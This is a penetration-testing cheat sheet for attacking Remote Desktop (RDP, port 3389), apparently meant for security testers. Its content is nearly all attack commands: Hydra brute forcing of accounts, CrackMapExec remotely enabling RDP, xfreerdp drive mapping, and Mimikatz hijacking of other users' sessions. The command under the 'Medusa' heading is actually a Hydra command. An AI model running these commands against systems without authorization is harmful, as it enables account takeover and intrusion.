Port 3389 | RDP
Enumeration
Nmap
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 <IP>
Bruteforce
Brute forcing can easily lock user accounts. If possible enumerate the domain password policy before proceeding.
Hydra
hydra -L <User/s.txt> -P <Password/s.txt> rdp://<IP>
Medusa
hydra -t 4 -l <User> -P <Password/s.txt> rdp://<IP>
Connecting
Crackmapexec
Requires administrative privileges, enables RDP on the target host.
crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -M rdp -o ACTION=enable # Enable RDP
rdesktop
rdesktop -u <Username> <IP>
rdesktop -d <Domain> -u <Username> -p <Password> <IP>
xfreerdp
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>'
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard
#Maps specified folder on attacking machine to RDP host
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
Hijacking
This method is not stealthy and will disconnect a users active terminal service session. However, you will also be able to connect to a disconnected session which could be stealthier.
This method also requires privileges as SYSTEM on the terminal server host.
Mimikatz
Invoke-Mimikatz -Command '"ts::sessions"'

Connect to the terminal services session.
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'
Man-in-the-Middle
SETH can be used to perform Man-in-the-Middle attacks over RDP.
RDP MiTMLast updated